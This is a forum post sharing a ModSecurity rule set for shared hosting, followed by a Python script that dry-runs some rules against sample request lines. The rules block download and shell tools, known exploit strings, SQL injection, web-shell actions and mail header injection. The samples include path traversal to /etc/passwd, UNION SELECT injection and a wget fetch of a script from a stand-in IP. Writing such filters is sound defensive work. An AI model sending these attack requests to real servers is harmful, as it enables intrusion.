mod_security

yulia
Verified User, joined Nov 2, 2008
I'm wondering what type of settings you guys all use for shared hosting environments, without overdoing it to the point where the system load increases too much and starts to give clients problems.

Currently, I've come up with:
Code:
# ModSecurity 1.x (SecFilter) syntax, as accepted by LiteSpeed's mod_security
# compatible engine. Default action: log and reject with 403.
SecFilterEngine On
SecFilterCheckURLEncoding On
SecServerSignature "LiteSpeed"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:403"

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
#SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
#SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# phpBB viewtopic.php: chr() inside a viewtopic request (two-rule chain,
# both filters must match)
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server.
# Patterns are regular expressions; the trailing space inside the quotes is
# part of the pattern, so the token must be followed by a literal space.
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "

# Known exploit signatures. Regex metacharacters (. ? *) are escaped so the
# strings match literally.
SecFilterSelective THE_REQUEST "/config\.php\?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F\.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "

# URL-encoded null byte. "%00" already matches "%00.txt", and the
# unselective SecFilter already covers THE_REQUEST, so the duplicate
# "%00.txt" rules from earlier revisions are dropped.
SecFilterSelective THE_REQUEST "%00"
SecFilter "%00"

# SQL injection: UNION with URL-encoded spaces or comment padding.
# "/**/" must be written "/\*\*/" or the asterisks are quantifiers.
SecFilterSelective THE_REQUEST "%20UNION%20"
SecFilterSelective THE_REQUEST "/\*\*/UNION/\*\*/"
SecFilterSelective THE_REQUEST "/\*\*/union/\*\*/"
#SecFilter "%20UNION%20"
#SecFilter "%20union%20"
#SecFilter "/\*\*/UNION/\*\*/"

# ModSecurity 2.x syntax, kept commented: SecRule is not understood by a
# 1.x-style SecFilter configuration.
#SecRule REQUEST_BODY "@validateByteRange 1-255" \
#"log,deny,phase:2,t:none,msg:'ModSecurity ASCIIZ Evasion Attempt'"

# PHP web-shell actions in the query string
#SecFilterSelective REQUEST_URI "act=f"
SecFilterSelective REQUEST_URI "act=chmod"
SecFilterSelective REQUEST_URI "act=ls"
#SecFilterSelective REQUEST_URI "act=search"
SecFilterSelective REQUEST_URI "act=tools"
SecFilterSelective REQUEST_URI "act=sql"
SecFilterSelective REQUEST_URI "act=security"
SecFilterSelective REQUEST_URI "act=fsbuff"

# Mail header injection (Subject:/Bcc:) anywhere except the webmail compose
# page. A rule ending in "chain" is joined to the next rule that is parsed,
# so a chain leader whose continuation is commented out must be commented
# out as well; otherwise it silently attaches to whatever rule follows.
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
SecFilterSelective THE_REQUEST "Subject\:" chain
SecFilterSelective ARG_Bcc ".*\@"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
SecFilterSelective POST_PAYLOAD "Subject\:" chain
SecFilterSelective POST_PAYLOAD "\s*bcc\:"
#SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective POST_PAYLOAD "\s*bcc\:\s*[a-z0-9._%-]+@[A-Z0-9.-]+\.[a-z]{2,}"
#SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|b?cc)[[:space:]]*:.*@"
#SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective ARGS_VALUES "\s*bcc\:\s*[a-z0-9._%-]+\@.*\.[a-z]{2,}"
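Added example (not from the post above, and not ModSecurity's engine): a Python dry run that applies a handful of the posted THE_REQUEST/REQUEST_URI patterns to constructed request lines, once against the raw line and once after a single URL decode. It is a plain regex matcher with a chain modelled as "every pattern must match"; which of the two views matches the real engine depends on whether your ModSecurity build normalises THE_REQUEST before filtering, and that has to be checked against your version, not assumed from this script. The request lines, the rule names and the IP address are made up for the demonstration.

```python
"""Dry run of a few SecFilter patterns against constructed request lines.

Illustration only: this is not ModSecurity and does not reproduce its
normalisation or chain semantics. It shows why a pattern's trailing space
and the engine's URL decoding decide what fires, and where substring
patterns produce false positives on ordinary traffic.
"""
import re
from urllib.parse import unquote

# Patterns taken from the posted config. Each rule is a tuple of regexes
# (a SecFilter "chain"); every member must match for the rule to fire.
RULES = {
    "viewtopic_chr": (r"viewtopic\.php\?", r"chr\(([0-9]{1,3})\)"),
    "wget":          (r"wget ",),
    "echo":          (r"echo ",),
    "cd_tmp":        (r"cd /tmp ",),
    "union_encoded": (r"%20UNION%20",),
    "union_comment": (r"/\*\*/UNION/\*\*/",),  # literal /**/UNION/**/
    "nul_byte":      (r"%00",),
    "act_chmod":     (r"act=chmod",),
}

# Constructed sample request lines (THE_REQUEST), not captured traffic.
SAMPLES = {
    "benign":        "GET /index.php?page=home&sort=date HTTP/1.1",
    "phpbb_chr":     "GET /viewtopic.php?t=1&highlight=%2527.chr(112) HTTP/1.1",
    "union":         "GET /news.php?id=1%20UNION%20SELECT%201,2 HTTP/1.1",
    "union_comment": "GET /news.php?id=1/**/UNION/**/SELECT/**/1 HTTP/1.1",
    "nul":           "GET /dl.php?f=../../etc/passwd%00.txt HTTP/1.1",
    "wget_tail":     "GET /r.php?c=wget HTTP/1.1",
    "wget_url":      "GET /r.php?c=wget%20http://198.51.100.7/x.sh HTTP/1.1",
    "echo_fp":       "GET /blog.php?title=cat%20echo%20and%20friends HTTP/1.1",
    "act_fp":        "GET /forum.php?react=chmod HTTP/1.1",
}


def fired(line, decode=False):
    """Return the sorted names of rules whose every pattern matches `line`.

    decode=True URL-decodes the line once before matching, simulating an
    engine that normalises THE_REQUEST; decode=False matches the raw line.
    """
    subject = unquote(line) if decode else line
    return sorted(
        name for name, chain in RULES.items()
        if all(re.search(pattern, subject) for pattern in chain)
    )


def report(decode=False):
    """Map each sample name to the rules it trips in the chosen view."""
    return {name: fired(line, decode) for name, line in SAMPLES.items()}


if __name__ == "__main__":
    for decode in (False, True):
        print("URL-decoded request line:" if decode else "raw request line:")
        for name, hits in report(decode).items():
            print(f"  {name:14} {', '.join(hits) or 'pass'}")
```

Two things stand out in the output. In the raw view, `wget%20http://...` never trips `"wget "` because the space is encoded, while in the decoded view `"%20UNION%20"` and `"%00"` go blind because the encoding they look for is gone; a rule set that mixes both styles is relying on the engine behaving two incompatible ways at once. And `"act=chmod"` fires on `react=chmod`, just as `"echo "` fires on a blog title once decoded, which is exactly the kind of client-facing breakage the question is about; anchoring the parameter name (for example matching the whole ARG name rather than a substring of REQUEST_URI) is the usual fix.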